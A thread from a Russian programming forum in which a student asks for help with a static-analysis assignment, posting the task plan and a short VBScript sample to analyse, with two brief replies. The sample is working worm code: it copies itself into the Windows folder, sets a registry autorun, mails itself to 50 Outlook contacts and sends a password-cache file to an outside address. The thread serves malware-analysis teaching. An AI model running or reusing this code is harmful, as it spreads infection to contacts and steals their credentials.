Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > IT форум > Помощь студентам
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 13.04.2018, 00:44   #1
Dgonvv
 
Регистрация: 16.04.2017
Сообщений: 3
По умолчанию Помощь с кодом

Пример что нужно сделать
Цитата:
Статический метод (исследования программного обеспечения)

1. Случай интерпретируемых языков высокого уровня

1.1. Способ полного анализа текста программного обеспечения

1) Декомпозиция текста на отдельные компоненты (проекты, модули, процедуры, функции и т. п.). В случае, если исходный код не структурирован (отсутствуют отступы, визуальное выделение процедур, функций, констант и т. п.), то структурирование кода. Выявление имен компонент. Построение гипотез о функциональности компонент по их именам.
2) Построение дерева/леса/графа вызовов.
Граф вызовов или связные его компоненты следует по возможности строить в виде дерева. Это не возможно лишь в том случае, когда в некоторой вершине возникают ссылки на вершины принадлежащие цепочке вызовов, приведшей из начальной вершины к данной (в этом случае ссылка добавляется как ветвь дерева к терминальной вершине). Граф строится вплоть до всех API-вызовов. Формат графа:
3) Идентификация и интерпретация API-вызовов. Выявление возможных неразрешенных ссылок.
Интерпретация осуществляется либо с использованием справочника системных вызовов, либо на основе анализа символического имени вызываемой процедуры/функции, либо по контексту, либо методом экспериментов.
4) Интерпретация функциональности нетерминальных вершин дерева вызовов снизу – вверх (возможно итерирование).
Внесение в исходный текст дополнительных комментариев о выявленной функциональности фрагментов кода. (Дополнительные комментарии выделяются зеленым цветом и вставляются с соблюдением стиля исходного текста и синтаксиса используемого языка программирования.)
Сравнение выявленной функциональности с гипотезами, построенными в соответствии с пунктом 1.
5) Выделение вершин дерева вызовов с критической функциональностью (используйте красный цвет, в том числе и в листинге в приложении).
6) Анализ алгоритма на наличие санкций в части реализации критической функциональности. Анализ базируется на построении схем алгоритмов.
А вот сам код
Код:
' WSH, VBS

On Error Resume Next
Dim FileSysObject, File
Set FileSysObject = CreateObject("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
File.Copy("c:\windows\Proga.vbs")

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite _
    "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\” + _
    "CurrentVersion\RunServices\progs", _
    "c:\windows\Proga.vbs"

Dim OutlookObject, OutMail, Index
Set OutlookObject = CreateObject("Outlook.Application")
For Index = 1 To 50
  Set OutMail = OutlookObject.CreateItem(0)
  OutMail.to = OutlookObject.GetNameSpace("MAPI"). _
                   AddressLists(1).AddressEntries(Index)
  OutMail.Subject = "Поздравление"
  OutMail.Body = "Поздравляю с праздником !"
  OutMail.Attachments.Add(File)
  OutMail.Send

Next
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to = "test@test.net"
OutMail.Subject = "Test"
OutMail.Body = "Это просто тест."
OutMail.Attachments.Add("c:\windows\toomas.pwl")
OutMail.Send

Последний раз редактировалось Dgonvv; 13.04.2018 в 00:45. Причина: Редактирование
Dgonvv вне форума Ответить с цитированием
Старый 13.04.2018, 06:26   #2
Aleksandr H.
2 the Nation Glory
Старожил
 
Аватар для Aleksandr H.
 
Регистрация: 27.05.2014
Сообщений: 3,289
По умолчанию

Полностью соответствует ТЗ. В чем проблема?
Кто умер, но не забыт, тот бессмертен.
Лао-Цзы.
Aleksandr H. вне форума Ответить с цитированием
Старый 13.04.2018, 10:03   #3
challengerr
Участник клуба
 
Аватар для challengerr
 
Регистрация: 30.07.2008
Сообщений: 1,601
По умолчанию

Цитата:
Сообщение от Aleksandr H. Посмотреть сообщение
Полностью соответствует ТЗ. В чем проблема?
Ему разбор нужен по плану, а не прога
"SPACE.THE FINAL FRONTIER.This's a voyage of starship Enterprise. It's 5-year mission to explore strange new worlds,to seek out new life and civilizations,to boldly go where no man has gone before"
challengerr вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помощь с кодом Программистер Помощь студентам 0 17.01.2017 21:18
Помощь в кодом C++ Snejok.dav.2580 Общие вопросы C/C++ 0 07.11.2015 15:31
Помощь с кодом Liberum34 Общие вопросы C/C++ 7 04.08.2014 23:26
Помощь с кодом screammassacre Общие вопросы C/C++ 4 02.12.2013 15:51
Помощь с кодом. -=Virus=- Помощь студентам 7 24.12.2009 07:38